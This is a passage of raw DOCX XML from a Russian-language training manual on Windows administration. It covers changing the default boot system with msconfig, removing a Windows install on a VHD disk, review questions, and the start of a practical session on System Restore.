        <w:t xml:space="preserve"> настроить очередность загрузки имеющихся на компьютере операционных систем. Будь то установка на другой раздел диска, будь то установка на виртуальный </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>VHD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">-диск – в любом из этих случаев загружаемой по умолчанию будет последняя установленная Windows. Вернуть первой системе первоочередность загрузки и настроить время отображения меню загрузчика можно в разделе </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>конфигурации</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">. Жмем клавиши </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        </w:rPr>
        <w:t>Win</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> для вызова утилиты </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Выполнить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, вводим команду </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>msconfig</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, жмем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1680950" cy="828000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="217" name="Рисунок 14" descr="Вводим команду">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водим команду">
                      <a:hlinkClick r:id="rId151"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId152" cstate="print"/>
                    <a:srcRect l="17426" t="17757" r="13950" b="23832"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1680950" cy="828000"/>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t xml:space="preserve">В открывшемся окне конфигурации переходим на вкладку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Загрузка</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">. Выбираем нужную систему для загрузки по умолчанию, жмем кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Использовать по умолчанию</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">. Также в графе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Таймаут</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> можем сменить предустановленные полминуты для осуществления выбора системы, уменьшив отведенное на раздумья время. После всех установок жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Применить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Ок</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</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2004150" cy="1227245"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="218" name="Рисунок 15" descr="Msconfi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sconfig">
                      <a:hlinkClick r:id="rId153"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId154" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2007986" cy="1229594"/>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rPr>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Перезагружаемся.</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737750" cy="705941"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="219" name="Рисунок 16" descr="Перезагружаемся">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ерезагружаемся">
                      <a:hlinkClick r:id="rId155"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId156" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1737795" cy="705959"/>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szCs w:val="24"/>
        </w:rPr>
        <w:t>Удаление Windows, установленной на VHD-диске</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Нет ничего проще, чем избавиться от ненужной Windows, установленной на </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>VHD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">-диске. Как уже упоминалось, для этого потребуется два несложных действия. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Первое</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>удаляем VHD-файл</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</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737750" cy="1263671"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="220" name="Рисунок 17" descr="Удаляем VHD-файл">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Удаляем VHD-файл">
                      <a:hlinkClick r:id="rId157"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId158" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1740987" cy="1266025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Второе</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>удаляем запись</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> о загрузке в разделе конфигурации системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1737750" cy="1218942"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="221" name="Рисунок 18" descr="Запись о загрузке в разделе конфигурации системы">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апись о загрузке в разделе конфигурации системы">
                      <a:hlinkClick r:id="rId159"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId160" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1740123" cy="1220607"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="0083647E" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc507788243"/>
      <w:bookmarkStart w:id="93" w:name="_Toc507788518"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Опишите Процесс установки Windows 10 на VHD-диск</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc22652225"/>
      <w:bookmarkStart w:id="95" w:name="_Toc26278725"/>
      <w:bookmarkStart w:id="96" w:name="_Toc507788251"/>
      <w:bookmarkStart w:id="97" w:name="_Toc507788526"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 6 Решение проблем сбоя программного обеспечения отраслевой направленности:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="95"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков установки и настройки программного обеспечения. Решение проблемы сбоя ПО отраслевой направленности: Использование Восстановления системы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">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 Решение проблемы некорректной работы программного обеспечения отраслевой направленности: использование восстановления системы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Использование Восстановления системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Согласно инструкции из теоретической части провести настройку сбора логов Event Forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся скриншоты этапов выполнения работы и комментарии к ним.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Согласно инструкции из теоретической части провести настройку сбора логов Event Forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Этот способ пригодится когда компьютер включается и работает, не важно как работает, главное что работает. Например после установки какой-то программы, или драйвера, появились проблемы с компьютером. Программу вы удалили, а вот проблемы остались. В таком случае откат системы должен помочь.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Делаем так: нажимаем «Пуск» и в строке поиска начинаем писать «восстановление». В результатах поиска находим и запускаем программу «Восстановление системы».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2083350" cy="2183772"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Рисунок 27248" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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48" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image231.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId161" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2085461" cy="2185985"/>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 xml:space="preserve">Откроется окно, в котором нажимаем «Далее». </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1773750" cy="1427038"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Рисунок 27249" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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49" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image232.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId162" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1775965" cy="1428820"/>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Теперь нужно выделить точку восстановления к которой вы хотите сделать откат и нажать «Далее».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1959611" cy="1591200"/>
            <wp:effectExtent l="19050" t="0" r="2539" b="0"/>
            <wp:docPr id="20" name="Рисунок 27250" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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50" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image233.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId163" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1963347" cy="1594234"/>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Подтверждении точки восстановления. Нажимаем «Готово».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1938923" cy="1555200"/>
            <wp:effectExtent l="19050" t="0" r="4177" b="0"/>
            <wp:docPr id="21" name="Рисунок 27251" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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51" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image234.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId164" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1941583" cy="1557334"/>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Еще одно предупреждение, жмем «Да».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2018550" cy="800913"/>
            <wp:effectExtent l="19050" t="0" r="750" b="0"/>
            <wp:docPr id="22" name="Рисунок 27252" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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52" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image235.jpg"/>
                    <pic:cNvPicPr>
